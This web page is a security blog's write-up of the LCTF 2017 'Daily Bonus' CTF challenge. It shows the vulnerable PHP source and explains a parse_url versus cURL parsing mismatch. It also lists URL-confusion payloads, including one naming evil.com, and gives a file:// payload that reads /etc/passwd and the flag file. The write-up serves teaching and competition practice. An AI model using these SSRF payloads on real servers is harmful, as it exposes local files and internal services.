<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.ico?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="php," />










<meta name="description" content="In Lctf 2017, there is a simple daily bonus. Here is the link. You can find the write-up here.">
<meta name="keywords" content="php">
<meta property="og:type" content="article">
<meta property="og:title" content="Write-up LCTF2017 Daily Bonus">
<meta property="og:url" content="/2017-11-22-Write-up-LCTF2017-Daily-Bonus/index.html">
<meta property="og:site_name" content="Security blog">
<meta property="og:description" content="In Lctf 2017, there is a simple daily bonus. Here is the link. You can find the write-up here.">
<meta property="og:updated_time" content="2017-12-05T14:22:18.319Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Write-up LCTF2017 Daily Bonus">
<meta name="twitter:description" content="In Lctf 2017, there is a simple daily bonus. Here is the link. You can find the write-up here.">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="/2017-11-22-Write-up-LCTF2017-Daily-Bonus/"/>





  <title>Write-up LCTF2017 Daily Bonus | Security blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Security blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="/2017-11-22-Write-up-LCTF2017-Daily-Bonus/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ꭰ">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Write-up LCTF2017 Daily Bonus</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-11-22T22:08:27+08:00">
                2017-11-22
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>In Lctf 2017, there is a simple daily bonus. Here is the <a href="http://211.159.161.162/test.php" target="_blank" rel="external">link</a>.</p>
<p>You can find the write-up <a href="https://github.com/LCTF/LCTF2017/blob/master/src/web/%E7%AD%BE%E5%88%B0%E9%A2%98/web%E7%AD%BE%E5%88%B0%E9%A2%98.md" target="_blank" rel="external">here</a>.<br><a id="more"></a><br>The following is source code :</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"><span class="keyword">if</span>(!$_GET[<span class="string">'site'</span>])&#123; </div><div class="line">	<span class="keyword">echo</span> &lt;&lt;&lt;EOF </div><div class="line">&lt;html&gt; </div><div class="line">&lt;body&gt; </div><div class="line">look source code: </div><div class="line">&lt;form action=<span class="string">''</span> method=<span class="string">'GET'</span>&gt; </div><div class="line">&lt;input type=<span class="string">'submit'</span> name=<span class="string">'submit'</span> /&gt; </div><div class="line">&lt;input type=<span class="string">'text'</span> name=<span class="string">'site'</span> style=<span class="string">"width:1000px"</span> value=<span class="string">"https://www.baidu.com"</span>/&gt; </div><div class="line">&lt;/form&gt;</div><div class="line">&lt;/body&gt;</div><div class="line">&lt;/html&gt; </div><div class="line">EOF; </div><div class="line">	<span class="keyword">die</span>(); </div><div class="line">&#125;</div><div class="line"></div><div class="line">$url = $_GET[<span class="string">'site'</span>]; </div><div class="line">$url_schema = parse_url($url); </div><div class="line">$host = $url_schema[<span class="string">'host'</span>]; </div><div class="line">$request_url = $url.<span class="string">"/"</span>; </div><div class="line"></div><div class="line"><span class="keyword">if</span> ($host !== <span class="string">'www.baidu.com'</span>)&#123; </div><div class="line">	<span class="keyword">die</span>(<span class="string">"wrong site"</span>); </div><div class="line">&#125;</div><div class="line"></div><div class="line">$ci = curl_init();</div><div class="line">curl_setopt($ci, CURLOPT_URL, $request_url);</div><div class="line">curl_setopt($ci, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</div><div class="line">$res = curl_exec($ci);</div><div class="line">curl_close($ci);</div><div class="line"></div><div class="line"><span class="keyword">if</span>($res)&#123; </div><div class="line">	<span class="keyword">echo</span> <span class="string">"&lt;h1&gt;Source Code:&lt;/h1&gt;"</span>; </div><div class="line">	<span class="keyword">echo</span> $request_url; </div><div class="line">	<span class="keyword">echo</span> <span class="string">"&lt;hr /&gt;"</span>; </div><div class="line">	<span class="keyword">echo</span> htmlentities($res); </div><div class="line">&#125;<span class="keyword">else</span>&#123; </div><div class="line">	<span class="keyword">echo</span> <span class="string">"get source failed"</span>; </div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>When I was trying to get the flag, the first problem is how to confirm that the param <code>site</code> is parsed by php function <code>parse_url</code>. In fact, on the 2017 Black Hat, Geeker Orange described the symptom when abusing parsers in the back-end server. You can get it from <a href="https://www.youtube.com/watch?v=D1S-G8rJrEk" target="_blank" rel="external">this video</a>. <code>parse_url</code> function accept any schema without verifying, I guess that no white list to restrict schema in the implementation of <code>parse_url</code>.</p>
<p>In a word, developers implemented <code>parse_url</code> , <code>readfile</code> and <code>cURL</code> and so on with their own standard instead of the <a href="https://tools.ietf.org/html/rfc3986#section-3.2.1" target="_blank" rel="external">RFC(3986)</a>. </p>
<blockquote>
<p><a href="http://foo@evil.com:80@google.com/" target="_blank" rel="external">http://foo@evil.com:80@google.com/</a></p>
<p><a href="http://foo@127.0.0.1" target="_blank" rel="external">http://foo@127.0.0.1</a> @google.com/</p>
</blockquote>
<p>The payloads above are quoted from Orange, it affects cURL whose version is below 7.54.0.However the second payload is still not patched because of it’s concerned with the glibc library.</p>
<p>So, I used the following payload to fuzz then see the response from web application.</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">http://www.baidu.com:11234:80/</div><div class="line">http://www.baidu.com#@www.baidu.com/</div><div class="line">http://test@www.baidu.com: @www.baidu.com/</div><div class="line">http://test@www.baidu.com:80@www.baidu.com/</div><div class="line">http://test@www.baidu.com:80 @www.baidu.com/</div><div class="line">http://test@127.0.0.1 @www.baidu.com/</div><div class="line">http://test@127.0.0.1:80@www.baidu.com/</div><div class="line">http://test@127.0.0.1:80 @www.baidu.com/</div><div class="line">http://www.baidu.com:11234:80/test.php</div><div class="line">http://www.baidu.com#@www.baidu.com/test.php</div><div class="line">http://test@www.baidu.com: @www.baidu.com/test.php</div><div class="line">http://test@www.baidu.com:80@www.baidu.com/test.php</div><div class="line">http://test@www.baidu.com:80 @www.baidu.com/test.php</div><div class="line">http://test@127.0.0.1 @www.baidu.com/test.php</div><div class="line">http://test@127.0.0.1:80@www.baidu.com/test.php</div><div class="line">http://test@127.0.0.1:80 @www.baidu.com/test.php</div></pre></td></tr></table></figure>
<p>All these payloads are variations from Orange <a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf" target="_blank" rel="external">PDF</a> (Awesome payloads). Till now, I was still far away from the flag. The hint in challenge descriptions is <code>local</code>,  then tried to change the schema from <code>http</code> to <code>file</code>. </p>
<p>Everything is still confused except the hint <code>local</code>, the parsers <code>parse_url</code>. If you are careful enough, you’ll find the <code>http://test@127.0.0.1:80@www.baidu.com/test.php/</code> on the 404 Not Found Page, it adds the slash <code>/</code> to <code>http://test@127.0.0.1:80@www.baidu.com/test.php</code>. </p>
<p>Now let’s add a question mark to the url then access that.</p>
<p><code>`file://test@127.0.0.1:80@www.baidu.com/ect/passwd?</code></p>
<p>Then with the response , I changed the path to <code>etc/flag?</code>.</p>
<p><code>LCTF{1eTus_q14ndao_B4_387t439hg9342}</code></p>
<p>Got the flag.</p>
<h4 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h4><p>The purpose of adding question mark to the end.</p>
<p>You can get answer from RFC(3986) or Orange PPT in 2017 Black Hat. Here is the quote from RFC(3896) section 3.2.</p>
<blockquote>
<p>The authority component is preceded by a double slash (“ //“ ) and is terminated by the next slash (“ /“ ), question mark (“ ? “ ), or number sign (“ #” ) character, or by the end of the URI.</p>
</blockquote>
<p>You must be careful with everything in the challenge. Don’t let anything suspicious go.</p>
<p>Happy hacking.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/php/" rel="tag"># php</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/Write-Up LCTF萌萌哒报名系统/" rel="next" title="Write-Up LCTF萌萌哒报名系统">
                <i class="fa fa-chevron-left"></i> Write-Up LCTF萌萌哒报名系统
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="One-experience-on-changing-rom-on-RedMi:XiaoMi-an/" rel="prev" title="One experience on changing rom on RedMi/XiaoMi and Play Store Installation">
                One experience on changing rom on RedMi/XiaoMi and Play Store Installation <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODY0MC81MjEx"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ꭰ</p>
              <p class="site-description motion-element" itemprop="description">Me. a lazy person</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://suroot.cn" title="c0rpse" target="_blank">c0rpse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.th1s.cn" title="th1s" target="_blank">th1s</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jkme.github.io" title="jkme" target="_blank">jkme</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Summary"><span class="nav-number">1.</span> <span class="nav-text">Summary</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ꭰ</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  

  

  
  

  

  

  

</body>
</html>
